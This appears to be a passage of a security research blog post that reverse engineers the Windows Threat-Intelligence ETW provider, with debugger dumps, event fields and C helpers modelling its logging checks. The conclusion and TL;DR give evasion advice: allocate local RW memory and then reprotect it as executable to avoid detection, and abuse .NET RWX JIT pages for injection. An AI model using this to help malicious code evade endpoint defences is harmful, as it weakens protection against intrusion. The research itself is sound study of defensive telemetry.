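
```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Mask value observed in this post for the threat intelligence handle. */
#define TI_ENABLED_KEYWORDS 0x000000001C085445ULL

/* Simplified model: an event is logged when its keyword shares at least
 * one bit with the enabled mask. */
bool keyword_enabled(uint64_t enabled_mask, uint64_t event_keyword)
{
    return (enabled_mask & event_keyword) != 0;
}

/* Count how many of the given keywords would pass the mask test. */
size_t count_enabled(uint64_t enabled_mask, const uint64_t *keywords, size_t n)
{
    assert(keywords != NULL || n == 0);
    size_t enabled = 0;
    for (size_t i = 0; i < n; i++) {
        if (keyword_enabled(enabled_mask, keywords[i]))
            enabled++;
    }
    return enabled;
}
```

For example, with hypothetical keywords 0x1, 0x2, 0x4 and 0x8, only 0x1 and 0x4 overlap with the low byte of the mask (0x45), so two of the four would be logged.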

Here, local and remote refer to whether the operation targets the caller's own (local) process or another (remote) process. We can see that local memory allocation and all but one of the remote operations are set to logged. There is a discrepancy here between this data and B4rtik's post. If remote virtual memory reads are not enabled here then how does Defender detect LSASS reads? Perhaps it is because B4rtik's Defender is ATP which I, unfortunately, do not have at the time of writing this. If this is true, then the handle's 0x00000000`1c085445 value may be different as well.

Writing Event Data

Since this system does not receive event data on any virtual memory reads, let's look at the case of writes. If the EtwEventEnabled function returns TRUE, it will proceed to write the data using EtwWrite:

EtwWrite setup and call

Following the function definition, the data, UserData, is passed in the 5th argument and the number of entries is in the 4th:

NTSTATUS EtwWrite(
  REGHANDLE              RegHandle,
  PCEVENT_DESCRIPTOR     EventDescriptor,
  LPCGUID                ActivityId,
  ULONG                  UserDataCount,
  PEVENT_DATA_DESCRIPTOR UserData
);

EtwWrite function definition

On a breakpoint in NtWriteVirtualMemory, we see the following arguments passed into the function:

rcx=0000000000000e7c (ProcessHandle)
rdx=0000020051af0000 (BaseAddress)
r8=000000cf8697e168  (Buffer)
r9=000000000000018c  (NumberOfBytesToWrite)

First four arguments to NtWriteVirtualMemory

On a breakpoint before calling EtwWrite in EtwTiLogReadWriteVm, the UserData can be seen like so:

2: kd> dq @rax L@r9*2
ffffd286`70970880  ffffd286`709709d0 00000000`00000004
ffffd286`70970890  ffffd601`2e59b468 00000000`00000004
ffffd286`709708a0  ffffd601`2e59b490 00000000`00000008
ffffd286`709708b0  ffffd286`70970870 00000000`00000008
ffffd286`709708c0  ffffd601`2e59b878 00000000`00000001
ffffd286`709708d0  ffffd601`2e59b879 00000000`00000001
ffffd286`709708e0  ffffd601`2e59b87a 00000000`00000001
ffffd286`709708f0  ffffd601`2cdb16d0 00000000`00000004
ffffd286`70970900  ffffd601`2cdb1680 00000000`00000008
ffffd286`70970910  ffffd601`2e991368 00000000`00000004
ffffd286`70970920  ffffd601`2e991390 00000000`00000008
ffffd286`70970930  ffffd286`70970878 00000000`00000008
ffffd286`70970940  ffffd601`2e991778 00000000`00000001
ffffd286`70970950  ffffd601`2e991779 00000000`00000001
ffffd286`70970960  ffffd601`2e99177a 00000000`00000001
ffffd286`70970970  ffffd286`709709f0 00000000`00000008
ffffd286`70970980  ffffd286`709709f8 00000000`00000008

Dumping EtwWrite EVENT_DATA_DESCRIPTOR entries

Each entry is an EVENT_DATA_DESCRIPTOR structure defined as such:

typedef struct _EVENT_DATA_DESCRIPTOR {
  ULONGLONG Ptr;
  ULONG     Size;
  union {
    ULONG Reserved;
    struct {
      UCHAR  Type;
      UCHAR  Reserved1;
      USHORT Reserved2;
    } DUMMYSTRUCTNAME;
  } DUMMYUNIONNAME;
} EVENT_DATA_DESCRIPTOR, *PEVENT_DATA_DESCRIPTOR;

EVENT_DATA_DESCRIPTOR structure

The Ptr points to the data and Size describes the size of the Ptr data in bytes. But what kind of data is logged? If we peek into some of these values, we can make out that the last two values correspond to the base address and the number of bytes written:

2: kd> dq poi(@rax+f0) L1
ffffd286`709709f0  00000200`51af0000
2: kd> dq poi(@rax+100) L1
ffffd286`709709f8  00000000`0000018c

Base address and number of bytes written in EtwWrite data
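The +f0 and +100 offsets in those commands fall out of the 16-byte descriptor size: entries 15 and 16 of the array. Here is a small sketch of that indexing, using a portable stand-in for EVENT_DATA_DESCRIPTOR with the same layout. The type and helper names are hypothetical, and read_u64_field only works when Ptr refers to memory the program itself can read, so it models the debugger's poi() rather than reading kernel memory.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Portable stand-in for EVENT_DATA_DESCRIPTOR (same 16-byte layout). */
typedef struct DataDescriptor {
    uint64_t ptr;       /* address of the field's data */
    uint32_t size;      /* size of that data in bytes */
    uint32_t reserved;
} DataDescriptor;

/* Byte offset of entry `index` from the start of the descriptor array. */
size_t descriptor_offset(size_t index)
{
    return index * sizeof(DataDescriptor);
}

/* Copy an 8-byte field out of the descriptor at `index`. */
uint64_t read_u64_field(const DataDescriptor *entries, size_t count, size_t index)
{
    assert(entries != NULL && index < count);
    assert(entries[index].size == sizeof(uint64_t));
    uint64_t value;
    memcpy(&value, (const void *)(uintptr_t)entries[index].ptr, sizeof value);
    return value;
}
```

descriptor_offset(15) is 0xf0 and descriptor_offset(16) is 0x100, matching the two poi() expressions above.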

But what are the other 15 arguments? Luckily, the data is already out there. I gathered this information in ETW Explorer written by Pavel Yosifovich. If we explore the Microsoft-Windows-Threat-Intelligence provider and select the appropriate event descriptor, we can see all of the arguments:

ETW Explorer showing arguments to NtWriteVirtualMemory event data

Here is the entire argument list:

OperationStatus
CallingProcessId
CallingProcessCreateTime
CallingProcessStartKey
CallingProcessSignatureLevel
CallingProcessSectionSignatureLevel
CallingProcessProtection
CallingThreadId
CallingThreadCreateTime
TargetProcessId
TargetProcessCreateTime
TargetProcessStartKey
TargetProcessSignatureLevel
TargetProcessSectionSignatureLevel
TargetProcessProtection
BaseAddress
BytesCopied

Full argument list for NtWriteVirtualMemory event data
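Lining this list up against the Size column of the descriptor dump from earlier gives a plausible field table. The pairing below is my own assumption based purely on order (17 names, 17 descriptors); the table name and helpers are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct FieldInfo {
    const char *name;
    uint32_t    size;  /* bytes, taken from the descriptor dump */
} FieldInfo;

/* Field names from the list above paired, by position, with dumped sizes. */
static const FieldInfo kWriteVmFields[] = {
    {"OperationStatus", 4},
    {"CallingProcessId", 4},
    {"CallingProcessCreateTime", 8},
    {"CallingProcessStartKey", 8},
    {"CallingProcessSignatureLevel", 1},
    {"CallingProcessSectionSignatureLevel", 1},
    {"CallingProcessProtection", 1},
    {"CallingThreadId", 4},
    {"CallingThreadCreateTime", 8},
    {"TargetProcessId", 4},
    {"TargetProcessCreateTime", 8},
    {"TargetProcessStartKey", 8},
    {"TargetProcessSignatureLevel", 1},
    {"TargetProcessSectionSignatureLevel", 1},
    {"TargetProcessProtection", 1},
    {"BaseAddress", 8},
    {"BytesCopied", 8},
};

#define WRITEVM_FIELD_COUNT (sizeof(kWriteVmFields) / sizeof(kWriteVmFields[0]))

/* Sum of all field sizes, i.e. the total event payload in bytes. */
size_t payload_size(const FieldInfo *fields, size_t count)
{
    assert(fields != NULL || count == 0);
    size_t total = 0;
    for (size_t i = 0; i < count; i++)
        total += fields[i].size;
    return total;
}

/* Index of the named field, or -1 if it is not in the table. */
int find_field(const char *name)
{
    for (size_t i = 0; i < WRITEVM_FIELD_COUNT; i++) {
        if (strcmp(kWriteVmFields[i].name, name) == 0)
            return (int)i;
    }
    return -1;
}
```

Under this pairing the sizes line up sensibly (IDs are 4 bytes, times and keys 8, signature and protection levels 1), and BaseAddress and BytesCopied land on indices 15 and 16, consistent with the two values dumped earlier.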

Protection Mask

If we reverse engineer another capability, NtAllocateVirtualMemory, we can see that there is another requirement besides being a local or remote operation. The call to MiMakeProtectionMask identifies the requested protection type:

MiMakeProtectionMask operates on the requested protection value

The return value of MiMakeProtectionMask is set to the r13d register which is later referenced when deciding if code should branch to EtwTiLogAllocExecVm:

MiMakeProtectionMask return value determines if the call should be logged

What's interesting is that MiMakeProtectionMask will return a value such that it will log the call if the requested protection includes execution permissions. I guess judging from the EtwTiLogAllocExecVm name, it could be assumed that this is the sole purpose.

This also occurs in the NtProtectVirtualMemory call. It first has a call to MiMakeProtectionMask with the requested protection:

MiMakeProtectionMask on requested protection

Though this is used to check if the protection type is valid, it may also return a value similar to that of NtAllocateVirtualMemory's. The second call to MiMakeProtectionMask is used to check the current protection:

MiMakeProtectionMask on current protection

The return value of this is combined with the value derived from the new protection. So if either the new or the current protection has execute permissions, the operation will be logged.
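The decision described in this section can be modelled with the public page protection constants. This is only a sketch of the observed behaviour: it does not reproduce MiMakeProtectionMask's actual return values, the function names are hypothetical, and it ignores the keyword filtering covered earlier, which still decides whether the event is ultimately written.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Page protection constants as defined in the Windows SDK (winnt.h). */
#define PAGE_NOACCESS          0x01
#define PAGE_READONLY          0x02
#define PAGE_READWRITE         0x04
#define PAGE_WRITECOPY         0x08
#define PAGE_EXECUTE           0x10
#define PAGE_EXECUTE_READ      0x20
#define PAGE_EXECUTE_READWRITE 0x40
#define PAGE_EXECUTE_WRITECOPY 0x80

#define ANY_EXECUTE (PAGE_EXECUTE | PAGE_EXECUTE_READ | \
                     PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)

/* True if the protection value grants execute access. */
bool has_execute(uint32_t protect)
{
    assert((protect & 0xFF) != 0);  /* a base protection must be given */
    return (protect & ANY_EXECUTE) != 0;
}

/* Allocation: only the requested protection matters. */
bool alloc_would_log(uint32_t requested)
{
    return has_execute(requested);
}

/* Reprotection: either the current or the new protection being executable. */
bool protect_would_log(uint32_t current, uint32_t requested)
{
    return has_execute(current) || has_execute(requested);
}
```

So an RW allocation does not reach the logging branch, whereas changing RW to RX (or RX to anything else) does pass this particular check.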

Conclusion

The Threat Intelligence ETW provides an interesting insight into how Microsoft may improve detection of malicious threats in conjunction with other kernel callbacks. Some things to note: being event-based makes this a retroactive system, and some data is not recorded. For example, in NtWriteVirtualMemory, the data being written is not captured. Though I guess that the data may already exist in the given target address so it might not matter.

Having analysed which operations may and may not be logged, perhaps creating bypasses against defensive tools that utilise Threat Intelligence ETW may be more reliable. For example, since local allocation without execute permissions will not be logged and local protection logging is disabled, it is possible to allocate RW memory for malicious code before reprotecting it with execute permissions. This would, theoretically, bypass any Threat Intelligence ETW captures.

Despite this technology being introduced, there is always the risk of false positives. Throughout the process of debugging, I've encountered an abundant amount of remote virtual memory writes just from the operating system itself. It's also known that .NET processes use RWX page permissions for JIT (which can also be abused for local injection of malicious code).

TL;DR: Don't touch other processes and allocate non-execute memory within your own process before reprotecting with execute permission.

References

Souhail Hammou - Examining the user-mode APC injection sensor introduced in Windows 10 build 1809

B4rtik - Evading WinDefender ATP credential-theft: kernel version

Hello World

NtRaiseHardError — Thu, 09 Apr 2020 06:51:56 GMT

suh
